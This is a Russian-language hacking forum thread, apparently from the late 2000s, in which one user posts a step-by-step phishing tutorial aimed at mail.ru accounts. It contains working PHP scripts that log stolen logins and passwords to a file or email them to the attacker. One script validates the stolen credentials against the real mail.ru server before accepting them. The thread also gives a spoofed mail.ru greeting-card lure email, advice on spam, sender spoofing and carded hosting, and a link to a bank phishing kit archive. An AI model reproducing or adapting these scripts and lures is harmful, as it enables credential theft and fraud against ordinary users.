-=Всё будет=-

Информация о пользователе

Привет, Гость! Войдите или зарегистрируйтесь.

Вы здесь » -=Всё будет=- » Хакинг » Создание и использование скамов

Создание и использование скамов

Страница: 1

Сообщений 1 страница 6 из 6

1

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол: Мужской
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

Здравствуйте. Сегодня я хотел бы рассказать вам о таком виде интернет-мошенничества, как фишинг.

Фишинг (англ. phishing, от password — пароль и fishing — рыбная ловля, выуживание) — вид интернет-мошенничества, цель которого — получить идентификационные данные пользователей.

Фишинг, в основном, основывается на создании фейковых сайтов или страниц, которые называются "Скамы"

Скамы (SCAM) - фейки сайтов,создаваемые с целью сбора вводимой информации,будь то идентификационные данные либо какая-то ценная информация. Зачастую скамы играют на руку кардерам - нередки случаи создания липовых шопов.

Создание скама зачастую сводится к изменению скрипта-обработчика таким образом,чтобы данные отсылались не на оригинальный сайт,а собирались в файле либо сразу отсылались на почту к злоумышленику. Дизайн таких сайтов ничуть не отличается от их братьев-оригиналов и заподозрить неладное может только опытный пользователь или же сам проект вводит защиту от фишинга. Например, Firefox второй ветки и Opera последних версии сравнивает сайт с черным списком и в случае обнаружения поддельного сайта извещает юзера, и не дает ввести данные. Internet Explorer также имеет защиту, но фильтр надо качать отдельно ( http://g.msn.com/8SEENUS020100/AddinsPh … ownloadURL )

Размах создания подобных сайтов удивляет. Исследовательская компания X-Force зарегистрировала 114 тысяч фишинговых сайтов за неделю с 11 по 18 июля. Согласно этой информации, 99,8% этих сайтов было создано с помощью средств автоматического фишинга. И только 0,2% не были подчинены общей стратегии для атаки.

Итак, а теперь попробуем создать скам-страницу крупнейшего мэил-сервиса России wwwmail.ru

Рассмотрим главную страницу. Для начала сохраним страницу на жесткий диск и посмотрим сурс. Ищем скрипт, к которому обращается страница при логине.

<form name=Auth method=post action="http://win.mail.ru/cgi-bin/auth">

0

2

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол: Мужской
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

Видим название скрипта: cgi-bin/auth

Теперь перейдем к созданию самого скрипта, который будет воровать пароли. Их может быть 2 вида: первый отсылает данные на мыло, а второй сохраняет в файл. Я покажу вам оба варианта.

Скрипт сохранения в файл.

<?
$Login = $HTTP_POST_VARS['Login'];
$Domain = $HTTP_POST_VARS['Domain'];
$Password = $HTTP_POST_VARS['Password'];           

$filename = "base.txt";
$file = fopen($filename, "a+" );
fputs ($file, 'Login: '.$Login."\n");
fputs ($file, 'Domain: '.$Domain."\n");
fputs ($file, 'Password: '.$Password."\n");                     
fclose($file);
?>

0

3

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол: Мужской
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

Скрипт отправки на мыло

<?
$Login = $HTTP_POST_VARS['Login'];
$Domain = $HTTP_POST_VARS['Domain'];
$Password = $HTTP_POST_VARS['Password'];           

$message .= "Login: ".$Login."\n"
$message .= "Domain: ".$Domain."\n"
$message .= "Password: ".$Password"\n";
{
mail("your_mail@mail.com", "new_mailru_acc", $message);
};
?>

0

4

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол: Мужской
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

Содержание может варьироваться и совершенствоваться, например при неправильной паре логин/пароль человек получит не простую страницу, а вернется на главную и его попросят ввести правильные данные. Попробуем написать подобный скрипт. В случае правильной пары, сервер вернет HTTP/1.1 302 OK. если же нет, то юзера вернут на главную страницу, где его попросят ввести данные заного.

<?php
define ( _Mail,"test@mail.ru");
define ( _Subj,"New lox found!!!1");
if (isset($_POST['Login']) && isset($_POST['Domain'] & isset($_POST['Password']))
{
$fsock = fsockopen("win.mail.ru",80,$err,$errdesc,3);
$params   = "Login=".$_POST['Login']."Domain=".$_POST['Domain']."&Password=".$_POST['Password'];
$request  = "POST /cgi-bin/auth HTTP/1.1\r\n";
$request .= "User-Agent: Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.4) Gecko/20070515 Firefox/2.0.0.4\r\n";
$request .= "Accept-Language: ru-ru,ru;q=0.8,en-us;q=0.5,en;q=0.3\r\n";
$request .= "Referer: -
$request .= "Content-Type: application/x-www-form-urlencoded\r\n";
$request .= "Host: win.mail.ru\r\n";
$request .= "Content-Length: ".strlen($params)."\r\n";
$request .= "Connection: keep-alive\r\n\r\n";
$request .= $params;
fwrite($fsock,$request);
while (!feof($fsock))  $responce .= fgets($fsock,1024);
if (strpos($responce,"HTTP/1.1 302 OK"))
{
  $msg = "New account : ".$_POST['Login']."@".$_POST['Domain']" : ".$_POST['Password'];
  mail (_Mail,_Subj,$msg,"From: billy@microsoft.com");
  $fd  = fopen("_signon.php","r");
  $log = fread($fd,filesize("_signon.php"));
  fclose($fd);
  echo $log;
}

if (strpos($responce,"Неверное имя пользователя или пароль "))
{
  $responce = substr($responce,strpos($responce,"<"));
  print $responce;
}
}
?>

0

5

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол: Мужской
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

Это обеспечивает большую вероятность того, что пользователь ничего не заподозрит, и решит-таки ввести верные данные.

Итак, когда мы написали скрипт для кражи конфидицальной информации, попробуем разместить наш фейк и заманить на него пользователей.
Хостинг подойдет любой, даже карженный, с поддержкой PHP. Заливаем главную страницу (со всеми картинками и измененным адресом скрипта).
Теперь, когда наш фейк в сети, мы можем начать нагонкой посетителей. Можно нагонять по-разному: спамом, гнать трафф и прочее.

На примере mail.ru можно спамить открыткой. Возьмем к примеру новогоднюю открытку
Дорогие друзья!

Мы поздравляем Вас с наступлением самого удивительного и волшебного праздника - Нового года и дарим нашу <a href="http://ваш_хост/">новогоднюю открытку</a>.

// или же так.

Для получения открытки нажмите на эту ссылку: <a href="http://ваш_хост/">http://mail.ru/cgi-bin/get_card?card=7815696ecbf1c96e6894b779456d330e</a>

Спасибо, что были с нами весь этот год, который принес столько интересных проектов:
# Видео@Mail.Ru позволяет бесплатно хранить в сети видеофайлы, а также просматривать интересные ролики других пользователей;
# Ответы@Mail.Ru помогают найти ответы на животрепещущие вопросы, поделиться знаниями и опытом;
# Интернет-пейджер Mail.Ru Агент обогатился множеством новых функций - из него можно бесплатно посылать SMS, звонить на мобильные и городские номера по всему миру. Последняя версия М-Агента стала разноцветной, из нее можно отправлять друзьям забавные мультики и анимированные смайлы.

А Фото@Mail.Ru до конца января предлагает Вам уникальную возможность напечатать фотографии по цене всего 2.50 руб. за фото 10х15 с доставкой в любую точку России!

Мы любим Вас и надеемся, что и в будущем году вы останетесь с нами. А чтобы Ваши желания обязательно сбылись, отправьте их Деду Морозу! Прямое почтовое сообщение с ним установлено на нашем новогоднем проекте 2007.Mail.Ru. Счастливого Вам Нового года!

С наилучшими пожеланиями,
Команда Mail.Ru

0

6

  • Автор: Андрюха
  • Андрюха
  • Зарегистрирован: 12-13-2007
  • Приглашений: 0
  • Сообщений: 706
  • Уважение: +0
  • Позитив: +1
  • Пол: Мужской
  • Провел на форуме:
    2 дня 21 час
  • Последний визит:
    08-30-2009 15:49:32

//Стоит помнить, чтобы привлекать серьезных пользователей, нужно спамить не с простого пхп скрипта на вашем хосте, а с нормальной спам-системы типа DMS. Используйте подмену обратного адреса, соксы.

Существует также способ привлечения пользователей с помощью троев. Такие трои, как AgentDQ, Nuclear Grubber, Snatch, Limbo, имеют функцию перехвата резолва адреса с последующим редиректом на фейковую страницу. То есть получается, что пользователь пишет http://mail.ru, а попадает на http://ваш_хост/fakes/mail.html, к примеру.

В IE существуют уязвимости, с помощью которых возможно подменять адрес сайта в адресной строке броузера.

Ссылки на несколько уязвимостей: http://www.securitylab.ru/vulnerability/275916.php | http://www.securitylab.ru/vulnerability/299569.php
Но т.к данная уязвимость используется достаточно редко и имеет множество реализаций, подробно описывать ее не буду. Кому будет нужно - существует море инфы по этому топику.

Теперь поговорим о кардерской направленности. Существует еще один вид фишинга. Это создание полноценных, уникальных веб-сайтов. Обычно эти сайты предлагают фейк-услуги, либо контент. Владельцы этих скамов собирают с наивных американцев данные о их кредитных картах. Для создания подобного сайта требуется (желательно) уникальный диз, движок, набор контента для привлечения.
И уже описанный выше вид - создание скамов известных банков, платежных систем.

Архив качественных скамов известных банков. [5mb]
http://rapidshare.com/files/43084250/fakes.rar.html

0

Страница: 1

Вы здесь » -=Всё будет=- » Хакинг » Создание и использование скамов

Создать форум.